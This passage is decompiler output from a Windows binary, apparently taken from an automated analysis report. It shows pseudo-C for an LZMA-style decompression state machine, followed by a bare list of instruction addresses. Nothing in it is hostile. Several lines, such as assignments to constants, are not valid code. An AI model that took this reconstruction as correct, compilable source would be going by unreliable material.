											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00406a76
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
